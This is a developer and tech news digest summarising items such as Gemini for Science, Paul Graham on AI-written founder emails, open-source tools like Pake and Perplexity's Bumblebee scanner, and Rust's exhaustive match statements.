Grab bag: Google DeepMind ships Gemini for Science (lab prototypes for literature tracking, code-from-goals, and hypothesis generation); Paul Graham warns that AI-written founder emails have a tell — a hard-hitting journalistic tone that makes him think less of the sender; and a manager reflects on the "feces umbrella" style of absorbing org dysfunction so the dev team can focus.[30]Google DeepMind: Gemini for Science is here.[31]Simon Willison: Quoting Paul Graham[32]Real Python: The Feces Umbrella Manager: Shielding Your Dev Team[33]Two Minute Papers: Google DeepMind CEO Likes Hard Questions
Google DeepMind introduced Gemini for Science, a collection of AI-powered lab prototypes built on Gemini and designed to accelerate scientific research. The toolset targets three core daily tasks: staying current with newly published papers, translating high-level research goals into usable code, and generating novel hypotheses. The announcement positions Gemini as a practical collaborator across the research lifecycle rather than just a problem-solving assistant.
Gemini can already assist in solving complex problems, but our new labs prototypes streamline daily scientific tasks.
Simon Willison quotes Paul Graham commenting on a growing pattern among startup founders: using AI to write outreach emails. Graham says the AI-generated output is identifiable by its distinctive tone, and that once he recognizes it he finds it hard to ignore. He describes the experience as feeling like being lied to, and says it diminishes his respect for the sender — implying the founder either cannot write or lacks confidence in their own voice.
Graham frames AI writing assistance as a low bar (teenagers can do it) and suggests founders who use it for professional communication are undermining rather than enhancing their credibility. Willison tagged the post under ai-misuse, framing it as a cautionary data point about authenticity and trust in AI-mediated professional communication.
It's hard not to ignore it
It feels like being lied to
The speaker describes their self-styled role as a 'feces umbrella': shielding the team from organizational chaos raining down from above, not by hiding reality but by translating it into actionable context. The approach works well for the team but tends to create friction with peer managers who feel challenged. The speaker candidly acknowledges this cost: managing up and across requires political skill, and someone who opts out of politics either thrives in low-politics environments or becomes roadkill. Good management ultimately combines clear communication of business goals, unblocking work, and empathy.
I used to joke that I was a feces umbrella. My goal was to let the crap that rained down from the other parts of the company not hit the folks on my team.
In some environments that works well, in some environments that means you're roadkill.
In this brief Two Minute Papers clip, Google DeepMind's CEO is challenged with intentionally short, sometimes single-word answer prompts. When asked to choose between Feynman or Newton, he acknowledges the question is extremely difficult, suggesting he relishes intellectually demanding problems rather than deflecting them. The clip frames this as a positive trait in a leader of a frontier AI lab.
Oh wow, that's hard.
Oh, wow. That's even harder.
A sweep of the day's tooling: GitHub Trending #34 (35 repos, heavy on Rust-built, privacy-first, token-efficient tools) and Fireship's tour of 10 weird OSS projects; Pake, which wraps any URL into a ~5MB Tauri desktop app; Perplexity's open-source Bumblebee scanner that inventories a dev machine read-only; a reminder that Rust's exhaustive match turns forgotten enum cases into compile errors; and a slick 2D Bézier-curve slider in marimo.[34]Github Awesome: GitHub Trending Today #34: aipointer, rmux, Photo-agents, zerostack, opensquilla, files-sdk, concord[35]Fireship: 10 weird OSS projects you need right now...[36]Better Stack: Pake: This CLI Tool Makes 5MB Desktop Apps[37]Better Stack: Perplexity Open-Sourced a Scanner Every Dev Should Know (Bumblebee)[38]The Pragmatic Engineer: Alice Ryhl: You cannot mess up switch statements in Rust[39]marimo: Yet Another Slider Improvement
This roundup opens at ~00:00 with a broad sweep of AI-augmented developer tooling. Microsoft's AI Engineer Coach is a VS Code extension that reads local AI session logs across Claude, Codex, and Xcode to generate actionable prompting insights and track practice scores. aipointer ~00:00 brings Google's Magic Pointer to every OS — wiggle your mouse or hit a hotkey and a glassmorphism overlay screenshots what you're pointing at and sends it to a vision model (Anthropic, OpenAI, or Gemini) for an inline answer.
At ~01:00, rmux (Armox) is introduced as a universal Rust multiplexer with a typed SDK that lets AI agents spawn, read, write, and control any CLI or TUI app programmatically — driving htop, Vim, psql, and more without tmux or screen. Photo-agents ~01:00 is an autonomous self-evolving agent framework using vision-grounded layered memory that writes its own skills after each successful task. ZeroStack ~02:01 is a minimalistic Rust coding agent obsessed with memory footprint, with no heavy runtime or unnecessary dependencies. Terra ~02:01 is a 7 MB all-in-one terminal app (Rust backend, React frontend) with multi-tab terminal, file explorer, and code editor supporting OpenAI, Anthropic, Groq, or local models via LM Studio. opensquilla (Open Skilla) ~03:01 is an open-source AI agent focused on token efficiency — smarter context management and leaner prompts to reduce API costs at scale. files-sdk ~06:03 is a unified TypeScript SDK providing a single API across S3, Cloudflare R2, Vercel Blob, Supabase, and more, letting developers write storage logic once and swap backends via config. Concord ~06:03 is a full Discord client built in Rust that runs in the terminal using only 20–40 MB RAM, with Vim-style navigation, fuzzy channel search, inline image previews via Kitty/iTerm2 protocols, and desktop notifications. Additional highlights include: Vercel's Zero ~05:03 — a systems language designed for AI agents with structured JSON compiler errors; Slopless ~10:09 — a TypeScript CLI that audits markdown for AI-generated writing patterns using 50+ deterministic rules; and Code Index ~14:12 — a repo dependency analyzer with blast radius impact scoring for safer AI-assisted development.
Armox is a universal Rust multiplexer with a typed SDK that lets you spawn, read, write, and control any CLI or TUI app from code. Native on Linux, Mac OS, and Windows. No T-Mux or screen dependency.
Photo agents is built to actually learn. It's an autonomous self-evolving agent framework that uses vision grounded layered memory... it writes its own skills. Every time it successfully completes a task, it codifies that knowledge and reuses it next time.
ZeroStack is the opposite. A minimalistic coding agent written in Rust built around one obsession, memory footprint and performance.
Open Skilla is an open-source AI agent designed for token efficiency, getting more intelligence per dollar out of the same budget.
Files SDK ends that — one unified TypeScript SDK with a single honest API that works across S3, R2, Versa Blob, Superbase, and more. Web standards, tree shakable, zero lockin.
Discord eats 800 megabytes of RAM just to show you text messages. Concord runs the entire thing in your terminal using 20 to 40 megabytes built in Rust.
I genuinely do not know if giving bots their own programming language is brilliant or terrifying.
The video opens ~00:00 with a lament about the AI-saturated GitHub feed before pivoting to celebrate genuinely weird human-built software. First up is **Ratty** ~01:01, a terminal emulator written in Rust and built on the Bevy game engine, featuring a spinning 3D rat cursor and GPU-accelerated rendering that lets you tilt your terminal in 3D space — at the cost of 300 MB of RAM. Next is **Terminal Phone** ~01:01, a push-to-talk voice and text app that runs entirely as a shell script over Tor with no servers, accounts, or phone numbers — Tor onion addresses serve as identity, making everything ephemeral and end-to-end encrypted.
Inspired by John Carpenter's 1988 film *They Live*, **OBEY** ~02:02 (a fork of uBlock Origin Light by developer David Lawrence) replaces ads with 80s sci-fi horror movie aesthetics instead of just hiding them. Then **CUDA Oxide** ~03:02, quietly released on GitHub by Nvidia, lets developers write GPU CUDA kernels in pure Rust using a `#[kernel]` annotation that compiles directly to PTX — no C++ or FFI involved. **Wario Synth** ~03:02 is a browser-based tool that converts any song into a Game Boy chiptune using the Web Audio API with two pulse waves, one wave channel, and one noise channel — all client-side.
The video then covers a pair of Epstein-files projects ~04:03: **Jmail**, which emulates Gmail as if Jeffrey Epstein were using it, and **Epstein Exposed**, a searchable database with a network graph of connections. **Exipedia** ~04:03 by developer Lyra Reebane reimagines Wikipedia as a TikTok-style infinite scroll feed, downloading 40 MB of Simple Wikipedia client-side and running its algorithm entirely in the browser. **Pewtor** ~05:03 (pwer.com) is a self-hostable browser desktop environment with a taskbar, draggable windows, file manager, notepad, code editor, and terminal. Finally, **Honker** ~05:03 is a SQLite extension written in Rust that adds Postgres-style NOTIFY/LISTEN to a SQLite file, delivering durable pub/sub, task queues, event streams, and a cron scheduler — all inside the same DB file.
Underneath the AI sewage layer and below the prompt bros and notion template goblins, there are still real humans building insane, beautiful, and deeply unnecessary software.
Everything comes at a cost, especially the spinning rat cursor.
It's yet another humble reminder that 99% of us don't need Kubernetes and would be perfectly fine running SQL light and node on a $5 VPS.
Pake, created in 2022 by TW93 (also the creator of the Mac tool Moom), lets you turn any website into a standalone native desktop application with one command ~00:00. It is built on top of Tauri 2, which taps into the system's native webview rather than bundling a full browser engine like Electron does. The custom Rust code TW93 wrote on top of Tauri 2 totals about 1,800 lines and handles window management, native menus, and JavaScript injection ~01:01.
In a live demo, the host wraps a personal film emulation project into a Mac app. The resulting DMG comes in at 4.3 MB, and the installed app uses only 61 MB of memory versus hundreds of MB for Electron apps like Slack (310 MB) ~02:02. Pake supports several CLI flags: `--debug` for devtools access, `--hide-title-bar` for a frameless window feel, `--inject` for custom CSS and JavaScript, and `--show-system-tray` for a tray icon ~03:02. Limitations include requiring a live running URL (closing the server leaves a blank screen), a dependency on PNPM/NPM internally despite being Rust-based (which caused version-conflict issues during testing), and no ability to edit default menu items. For use cases beyond simply wrapping a live web URL — such as bundling local app code or running backend logic — alternatives like Electron Bun or Zero Native are more appropriate ~04:02.
[00:00] "This is Pake, a command-line tool that turns any website into a native desktop app with a single command."
[01:01] "The actual custom code written by TW93 on top of Tauri 2 is about 1,800 lines of Rust and handles things like window management, native menus, and JavaScript injection."
[02:02] "Our app only uses 61 megabytes of memory compared to the Arc browser, which is using loads."
[04:02] "Pake is the fastest way to wrap a live website, but if you need anything beyond that, it's best to reach for something else."
Bumblebee addresses a blind spot in typical security postures: the developer's local machine. While most teams have visibility into CI pipelines, containers, and production environments, the dev machine accumulates half-finished projects, global packages, virtual environments, and AI tooling that never appear in clean official inventories. As explained at ~00:00, supply chain attacks often prompt the wrong response — asking everyone to run package manager commands — which risks triggering malicious lifecycle scripts in the very package being investigated. Bumblebee's read-only metadata approach sidesteps this entirely: it reads lock files and manifest metadata without calling npm, pip, or any other package manager.
The tool ships as a single Go binary with zero non-standard library dependencies and supports three scan profiles ~04:03: a lightweight `baseline` scan for regular developer endpoint inventory (global packages, editor/browser extensions, MCP configs), a `project` scan targeting known workspace directories like ~/code or ~/src, and a deep `incident response` mode that accepts explicit roots and an exposure catalog with a duration limit. Coverage spans npm, pnpm, Yarn, Bun, Go modules, VS Code/Cursor extensions, and — notably — MCP JSON configs ~05:03, which the host describes as "the new ENV files" proliferating across developer machines. Output is NDJSON, making it trivially pipeable to jq, an MDM system, a SIEM, or an agentic workflow. The recommended workflow is a weekly `bumblebee scan --profile baseline` to maintain a current snapshot, switching to a deeper scan when an incident occurs — giving security teams a fast, evidence-based answer to "who is exposed and where" ~08:06.
[00:00] By the time everyone is panicking, the question is not is production safe, it's did anyone install this thing locally.
[03:02] SCA tools are mostly about your application dependencies. SBOM tools are about what you shipped. EDR is about what you executed. Bumblebee is about the local developer state.
[05:03] MCP configs are becoming the new ENV files. We have them all over our system.
[06:03] The dev machine can get messy. It has half-finished projects. It has old clones, global package test virtual environments, AI tooling, all the stuff that never shows up in your clean official inventory.
[08:06] Nobody wants to debate. They want to know who is exposed, where is it, and how fast prove it.
Alice Ryhl explains that unlike switch statements in most languages where a forgotten enum case silently falls through to a default, Rust's match statement is exhaustive by design — missing a branch is a compiler error. This property is especially powerful during refactoring: when you add a new variant to an enum, the compiler immediately flags every match site that needs updating. The workflow becomes 'fix compiler errors until the compiler stops shouting,' which guarantees completeness without manual audit.
If you are missing one, that's a compiler error.
I just fix the compiler errors until the compiler stops shouting, and then, once I've done that, I've updated every place I need to update.
This short demo clip introduces a new slider widget for marimo notebooks that operates in two-dimensional space using a Bézier curve as its underlying model. Nodes are draggable and connected by interpolated lines; recursive line-spanning produces the curve's characteristic smooth shape. Users can double-click to add nodes, enabling increasingly elaborate paths, and can close the loop to create continuous, creative forms — demonstrating marimo's push toward richer, more expressive UI controls.